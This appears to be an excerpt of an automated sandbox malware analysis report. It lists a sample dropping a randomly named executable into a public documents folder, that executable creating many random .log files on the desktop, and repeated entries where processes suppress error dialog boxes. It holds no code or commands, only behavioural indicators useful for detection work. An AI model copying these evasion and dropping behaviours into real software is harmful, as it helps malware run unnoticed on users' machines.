Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\uRCnOlqd.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\FxxLTNKF.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\xTpVjUvY.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\fMYqQhPK.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\BHGUMQKM.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\kAqpsefy.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\aMLzISkQ.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\IEuUpfEB.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\zWbEFDzT.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\iPKZlQUF.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\YgrJBoPX.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\GTPDiSuI.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\wlwnypob.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\bmXzZwPf.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\nXdxeIZI.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\fuVIuOJa.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\MitCbspL.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\CuOMrhud.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\tQGWHnew.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\cJprnBzi.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\RVLBDpEA.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\ImrlTNzS.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\qaPgAreD.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\XNoagVJo.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\NZJkwJOG.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\xYDfcGYs.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\npkPtdTK.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\cBFZJSYc.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\JjTtpNNN.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\thNpVJYz.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\itiylxdQ.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\aQaJCENj.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\QhHtScIC.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\GyndizDU.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\ihTQsugx.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\keuZOuus.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\bBmjeBfL.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\QNHtupkd.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\XKvsXEeS.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\OcccncZk.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\DoxmDQeC.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\tFeWToZU.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\btCRzSEF.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\JgaLgwjq.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\sZJgMJEc.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\hlfqcyJu.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\QeOLILef.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\wHQFpXeP.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\WWrklrjU.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\FHqnnVdz.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\nvPhTzIk.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\bCZRjEXC.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\SYRbALIV.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\jFYrMCHr.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\YRuAcrMJ.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\BspVIDPh.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\EzneeVJd.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\tLIouJOv.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\bzhjaotg.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\KsQEGBOR.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\IhuDGjiQ.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\qVSxnNNB.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\XIqsTrtm.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\GBZNzENY.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\wNvWPtSq.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\fGerwGnb.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\USABMust.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\CGYwsYXe.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\kzHRZmsQ.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\bQoBpJni.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\zVsflLNl.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\ohOpBzSD.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\XaxKhNmp.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\VPbJhuHo.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\vfCpeOMs.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\mwiZumHK.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\iNKhTOoj.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\drzBFnSx.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\agdAFVnw.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\KeYvlRxi.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\AqtFBGCA.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\rNlQSMnT.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\gZGZiBsl.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\PSpuOONW.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\FeLEeCSo.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\mRjyKgxZ.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\UFHtrLcK.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\BoVNXGRv.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\kgEiDTmg.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\aykSTqhz.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\PKGckfmR.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\xxeWQJRC.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\oPLHggMU.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\VCjBMLrF.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\NZaMcRbY.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\wSKhJewJ.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\mjqRZCrc.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\AxYXcbrb.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\hkwSIGWM.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\PYUMpkBx.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\EkqWFYHP.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\lSDqlTwz.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\LieVinBD.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\BuzfybGV.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\rLgPOzBo.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\jhXaeGlG.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\QVwUKkQs.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\IrnfaqBK.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\AnBXspYe.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\kdLAuCIK.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\iTpzukdJ.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\RMYUaxxv.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\GYueqmCN.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\oMSZXQhy.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\XEBuDdCj.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\DnOOjYsU.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\lbnIQCXF.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\anISgrcX.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\EcmNwYns.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\yGbhhxRG.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\oSxqxmWY.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\WLgLezrK.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\MXCVunwb.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\CoiFKLru.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\lhRaqYLf.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\byyKGwGy.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\JmWFnalj.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\qUjZTVbT.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\PezePGqX.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\FvgOgdlp.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\njEJMHQa.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\eAktcfLt.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\TMGCsTQL.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\ktNSFLQh.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\YAYBVQfz.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\IySxBMpl.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\wEdgRRFC.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\NlkveJFZ.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\DCRfugzr.log	Jump to dropped file

Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
